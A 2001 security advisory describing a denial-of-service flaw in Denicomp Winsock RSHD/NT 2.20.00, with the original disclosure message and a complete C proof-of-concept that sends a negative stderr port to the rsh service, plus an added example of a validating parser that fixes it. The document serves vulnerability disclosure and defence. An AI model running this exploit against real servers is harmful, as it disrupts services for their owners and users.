Category:   Application (Generic)  >   RSHD
Vendors:   Denicomp Systems
Denicomp's Winsock RSHD/NT Can Be Denied Service By Remote Users Sending Invalid Port Numbers
SecurityTracker Alert ID:  1002930
SecurityTracker URL:  http://securitytracker.com/id/1002930
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Dec 10 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.20.00
Description:   A denial of service vulnerability has been reported in Winsock RSHD from Denicomp Systems. A remote user can cause the rsh service to consume excessive CPU resources by sending an invalid port number to the service.

It is reported that a remote user can send an invalid port number (such as a negative number) to the Winsock RSHD to cause the daemon to attempt to connect to all ports below 1024 (even negative) and consume a large amount of CPU processing resources.

The vendor has reportedly been notified.

A demonstration exploit transcript is provided in the Source Message.

Impact:   A remote user can cause the RSH daemon to consume a large amount of CPU processing resources, resulting in a potential denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.denicomp.com/rshdnt.htm
Cause:   Exception handling error
Underlying OS:   Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Date:  8 Dec 2001 14:24:48 -0000
Subject:  Winsock RSHD/NT 2.20.00 CPU overusage when invalid data is send




Greetings,

Seems that Winsock RSHD/NT has a bug in handling
invalid port numbers of the stderr stream. When an rsh
client connects to the daemon it sends the port number
to which the daemon will send informational data (stderr).
When this port is invalid (a negative number for
example) Winsock RSHD/NT attempts to connect to
all ports below 1024 (even negative) and consumes a
large amount of CPU time. This may lead to a DoS attack.
The vendor was informed but no measures were taken.

Below is a simple demo:

/*
** WRSHDNT 2.20.00 CPU overusage demo
** jimmers@yandex.ru
*/

#define	HOST	"localhost"
#define	PORT	514

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

int main(int argc, char * argv[]){
	SOCKET s;
	WSADATA WSAData;
	LPHOSTENT lpHostEnt;
	SOCKADDR_IN sockAddr;
	int res, on = 1;
	/* The four NUL-terminated fields an rsh client sends, in order. */
	char *stderr_port = "-666";	/* invalid (negative) stderr port */
	char *local_user  = "Administrator";
	char *remote_user = "root";
	char *cmd = "help";

	res = WSAStartup( MAKEWORD( 2, 2 ), &WSAData);
	if(res != 0){
		res = WSAGetLastError();
		printf("WSAStartup() failed, WSAGetLastError: %d\n", res);
		return 1;
	}
	
	lpHostEnt = gethostbyname(HOST);
	if(lpHostEnt == NULL){
		res = WSAGetLastError();
		printf("gethostbyname() failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	
	s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(s == INVALID_SOCKET){
		res = WSAGetLastError();
		printf("socket() failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}

	sockAddr.sin_family	= AF_INET;
	sockAddr.sin_port	= htons(PORT);
	sockAddr.sin_addr	= *((LPIN_ADDR)*lpHostEnt->h_addr_list);
	
	res = connect(s, (PSOCKADDR)&sockAddr, sizeof(sockAddr));
	if(res != 0){
		res = WSAGetLastError();
		printf("connect() failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}

	/* Each field is sent with its terminating NUL (strlen + 1). */
	Sleep(400);	
	res = send(s, stderr_port, strlen(stderr_port)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(stderr_port) failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	
	printf("send(stderr_port): %d\n", res);

	Sleep(400);	
	res = send(s, local_user, strlen(local_user)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(local_user) failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(local_user): %d\n", res);


	Sleep(400);	
	res = send(s, remote_user, strlen(remote_user)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(remote_user) failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(remote_user): %d\n", res);


	Sleep(400);	
	res = send(s, cmd, strlen(cmd)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(cmd) failed, WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(cmd): %d\n", res);

	WSACleanup();
	return 0;
}
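
The server-side check whose absence the advisory describes, as an added example (not part of the original message and not the vendor's code): a strict parser for the stderr-port field that rejects values such as "-666" before the daemon attempts any connection. The function name, status codes and 6-byte field limit are assumptions of this example; a value of 0 is accepted and means the client requested no separate stderr channel.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define RSH_PORT_FIELD_MAX 6	/* assumed limit: 5 digits plus the NUL */

enum port_status {
	PORT_OK = 0,		/* *port_out holds 0 or 1..65535 */
	PORT_ERR_UNTERMINATED,	/* no NUL within RSH_PORT_FIELD_MAX bytes */
	PORT_ERR_EMPTY,		/* NUL arrived before any digit */
	PORT_ERR_NOT_DIGIT,	/* sign, space, letter, ... */
	PORT_ERR_RANGE		/* value above 65535 */
};

/* Validate the first client field: ASCII decimal port followed by NUL. */
enum port_status parse_stderr_port(const unsigned char *buf, size_t len,
                                   unsigned *port_out)
{
	unsigned long value = 0;
	size_t i, limit = len < RSH_PORT_FIELD_MAX ? len : RSH_PORT_FIELD_MAX;

	for (i = 0; i < limit; i++) {
		if (buf[i] == '\0') {
			if (i == 0)
				return PORT_ERR_EMPTY;
			*port_out = (unsigned)value;	/* written only on success */
			return PORT_OK;
		}
		if (buf[i] < '0' || buf[i] > '9')
			return PORT_ERR_NOT_DIGIT;	/* rejects '-' outright */
		value = value * 10 + (unsigned long)(buf[i] - '0');
		if (value > 65535UL)
			return PORT_ERR_RANGE;
	}
	return PORT_ERR_UNTERMINATED;
}

int main(void)
{
	/* Constructed sample fields; "-666" is the value used in the demo. */
	static const char *samples[] = { "0", "1022", "-666", "70000" };
	unsigned port = 0;
	size_t i;
	for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
		enum port_status st = parse_stderr_port(
			(const unsigned char *)samples[i], strlen(samples[i]) + 1, &port);
		printf("%-6s -> status %d\n", samples[i], (int)st);
	}
	return 0;
}
```

A daemon using such a check would close the connection on any status other than PORT_OK instead of falling through to its connect loop.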

 
 

